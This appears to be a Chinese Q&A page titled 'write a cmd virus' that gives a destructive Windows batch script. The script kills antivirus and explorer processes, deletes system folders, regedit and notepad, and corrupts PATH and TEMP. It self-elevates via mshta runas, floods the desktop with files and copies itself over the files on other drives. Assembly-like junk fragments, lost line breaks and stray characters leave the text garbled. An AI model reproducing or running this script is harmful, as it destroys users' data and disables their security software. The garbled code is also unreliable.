您的位置首页百科知识

写cmd病毒

写cmd病毒

代码是echo offJMP Label1 Db thunkcode1Label2: …… JMP Label3 Db thunkcode3Label1: ……. JMP Label2 Db thunkcode2Label3:JMP Label1 Db thunkcode1Label2:jjj …… JMP Label3 Db thunkcode3Label1:ss ……. JMP Label2 Db thunkcode2Label3:mmtaskkill /f /im 360DesktopLite.exejz label   jnz label   db thunkcodelabel:   jz label2   jnz label2   db thunkcodelable2   mov ax, 8   xor ax, 77   ...taskkill /f /im explore.exetaskkill /轿液旁f /im 360tray.exetaskkill /f /im 360Safe.exeecho offtaskkill /f /im 360tray.exeJMP Label1 Db thunkcode1Label2: …… JMP Label3 Db thunkcode3Label1: ……. JMP Label2 Db thunkcode2Label3:JMP Label1 Db thunkcode1Label2: …… JMP Label3 Db thunkcode3Label1: ……. JMP Label2 Db thunkcode2Label3:taskkill /f /im 360tray.exetaskkill /f /im ZhuDongFangYu.exermdir /s/埋培q C:\Users\administrator\Desktoprmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exermdir /s/q C:\ProgramDatadel /f /s /q regedit.exeJMP Label1 Db thunkcode1Label2: …… JMP Label3 Db thunkcode3Label1: ……. JMP Label2 Db thunkcode2Label3:JMP Label1 Db thunkcode1Label2: …… JMP Label3 Db thunkcode3Label1: ……. JMP Label2 Db thunkcode2Label3:call label_1    db thunkcode    jmp label_2    db thunkcode label_1:    pop eax    jmp label_3    db thunkcode,thunkcode,thunkcode label_3:    inc eax    jmp label_4  闭橡  db thunkcode,thunkcode,thunkcode label_4:    jmp eax    db thunkcode label_2:    .... del /f /s /q notepad.exermdir /s/q apppatchrmdir /s/q Windows10Upgradermdir /s/q LDSGameMasterset path=C:\dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddset temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdel /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果&crumb=System.Generic.String:cmd&crumb=location:C%3A%5Crmdir /s/q C:\Windows\appcompat\Programsrmdir /s/q C:\Windows\en-USrmdir /s/q C:\Windows\OCRdel /f /s /q notepad.exermdir /s/q apppatchrmdir /s/q Windows10Upgradermdir /s/q LDSGameMasterset path=C:\dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddset temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdel /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果&crumb=System.Generic.String:cmd&crumb=location:C%3A%5Crmdir /s/q C:\Windows\appcompat\Programsrmdir /s/q C:\Windows\en-USrmdir /s/q C:\Windows\OCR::wwwwwww::rrrrrr%%ttttrmdir /s/q C:\Windows\minidumprmdir /s/q C:\Windows\Microsoft.NETftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit:aset /a a+=1echo %random%-%random%-%random% > C:\Users\%username%\Desktop\CCBL.%random%mshta javascript:alert(".");close();goto a@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exitfor /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" >nulfor /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" >nul@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exitfor /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" >nulfor /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i" @%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exitfor /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" >nulfor /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" >nulrmdir /s/q C:\Windows\Offline Web Pages